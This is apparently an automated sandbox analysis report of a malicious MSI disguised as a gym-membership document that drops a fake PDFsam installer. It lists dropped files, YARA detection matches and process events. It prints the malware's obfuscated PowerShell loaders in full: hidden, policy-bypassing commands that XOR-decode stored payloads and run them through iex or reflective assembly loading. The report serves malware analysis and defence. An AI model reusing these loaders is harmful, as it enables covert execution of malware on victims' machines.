                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hXqDYGUnMgWuIlLR.sZnxWdHykgCfDcpKVe entropy: 7.9980611173Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZtRIfkCwMOyJL.MCVJNRdxSHsOvY entropy: 7.99894056135Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yBdqUfkusbIrSNG.CTnqNUAEuJYpGLaF entropy: 7.99865967011Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmBuKsoidaTwgDcFe.QlMTbxijnHFgmJYK entropy: 7.9982117393Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DYfgibnQrxLj.hOuIyCYPmXAGUjqLak entropy: 7.99896022976Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rOGQnvNyDXm.GYAkivKUFNltmefhy entropy: 7.99888956702Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EaKbvVgGCzecZ.VDlowjKUnbW entropy: 7.99892996939Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tZWfRzoarqT.MsBODnGxVfFZjQiN entropy: 7.99893902107Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhgrcMJXSHzINnGbdDT.NVnmCWbAGhrQ entropy: 7.99776775828Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xASXwpkHaBguhUI.piQYzfyXZSBjntbV entropy: 7.99881906242Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jSIcBHGhQXNk.pQrstCqiKoeTbV entropy: 7.99815115203Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xlJMWToIZkXsRyB.ayIRtvqOPVj entropy: 7.99907095854Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZfrxTeWIsXbjypzJFid.QdkxpCzEYg entropy: 7.99877832613Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rxgqSYbFXufO.gRWDMzZTNHrxBnQGU entropy: 7.99890165652Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD entropy: 7.99810931983Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwplegIUuTzoJVExvd.iryKnwxsIA entropy: 7.99906229326Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TMDPfUGCOdpw.mCRoOzBkGQrPAgtNbHd entropy: 7.99781343664Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pqNrZDvUBGJei.TQopRzkgmVJhZD entropy: 7.9980662621Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CujBDfrFwxaX.blogVMOPHDtKfWIGyN entropy: 7.99747176866Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UKhCsubemgyp.UtjOkbCVrGJosyNavYS entropy: 7.99907920302Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\sewoxypvrFhRNzJ.RltNnbpGUKk entropy: 7.99909826538Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\iGucUlCvKxEwoN.nONboWdZHVufETg entropy: 7.99897557823Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eVtyxMBYrJQpUwFPkG.hAgncHXBEDxVYMRU entropy: 7.99894564308Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JlvCxXarWEkReOwQ.isJHCgwaAtNj entropy: 7.99727346353Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EIgMSfpHlbtdkq.DshtyfZQgnB entropy: 7.99896784264Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dquYUPXIpbHo.eFBYJvTHAI entropy: 7.99870374331Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qgNuTbxloWIeDXCrt.lzPMosrtYxFwCTdD entropy: 7.9986756322Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BKnRcQXSWtl.BpuPTZdbXyvxcSsVKI entropy: 7.99849984304Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jdrXyZweGIpOvWn.begEGqBwYxy entropy: 7.9981996262Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xioUVAHDRBaSQOhqrEe.GJAgmouSfxi entropy: 7.99692081562Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bGBjUzNTFSfVDMxwy.UMBTVDaYozW entropy: 7.99767802718Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hFXYUJLPGR.UNGrxiYgbkXuFoahZ entropy: 7.99699538601Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmuPvBJXSECTxI.BTSKVizGswAe entropy: 7.99824156515Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DwYnKPqzdQp.EbGeJrITVZy entropy: 7.99889682121Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BTXVNigKFQClxroRqaO.wgEMARZjpGPJuSCyod entropy: 7.99870713574Jump to dropped file

                        System Summary:

                        barindex
                        Source: 00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.746350232.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.749409808.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.750055391.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.742546203.000001B512853000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
                        Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID20.tmpJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5206a8.msiJump to behavior
                        Source: PDFsamEnhanced7Installer.exe.1.drStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: PDFsamEnhanced7Installer.exe.1.drStatic PE information: Resource name: IDT_SZSR type: Zip archive data, at least v2.0 to extract
                        Source: PDFsamEnhanced7Installer.exe.1.drStatic PE information: Resource name: V_D_ARCHIVE type: Zip archive data, at least v2.0 to extract
                        Source: PDFsam_Enhanced_7_Installer.exe.6.drStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: PDFsam_Enhanced_7_Installer.exe.6.drStatic PE information: Resource name: IDT_SZSR type: Zip archive data, at least v2.0 to extract
                        Source: PDFsam_Enhanced_7_Installer.exe.6.drStatic PE information: Resource name: V_D_ARCHIVE type: Zip archive data, at least v2.0 to extract
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
                        Source: Nyship-Empire-Plan-Gym-Membership.msiBinary or memory string: OriginalFilenameCustomActions.dll vs Nyship-Empire-Plan-Gym-Membership.msi
                        Source: PDFsamEnhanced7Installer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: PDFsam_Enhanced_7_Installer.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                        Source: Nyship-Empire-Plan-Gym-Membership.msiStatic PE information: invalid certificate
                        Source: Nyship-Empire-Plan-Gym-Membership.msiVirustotal: Detection: 12%
                        Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi'
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe'
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 CJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CAJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe' Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeProcess created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServerJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI35C.tmpJump to behavior
                        Source: classification engineClassification label: mal100.rans.troj.evad.winMSI@19/326@2/3
                        Source: C:\Windows\System32\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.iniJump to behavior
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: Nyship-Empire-Plan-Gym-Membership.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 90.64%
                        Source: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exeMutant created: \Sessions\1\BaseNamedObjects\PDFsam Enhanced 7 Installer Mutex
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
                        Source: C:\Windows\System32\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\ClickToRunStore\ApplicationsJump to behavior
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}Jump to behavior
                        Source: Nyship-Empire-Plan-Gym-Membership.msiStatic file information: File size 9105408 > 1048576
                        Source: Binary string: ?crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMcrypto\ex_data.c source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb> source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\PDFsam_Enhanced_7_Installer.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp
                        Source: Binary string: D:\TemporaryBuilds\installer_builder_1\66\s\_bin\pdfsam7\Win32\Statistics.pdb source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp

                        Data Obfuscation:

                        barindex
                        Suspicious powershell command line foundShow sources
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'Jump to behavior
                        Source: MSI35C.tmp.0.drStatic PE information: section name: _RDATA
                        Source: MSI5DE.tmp.0.drStatic PE information: section name: _RDATA
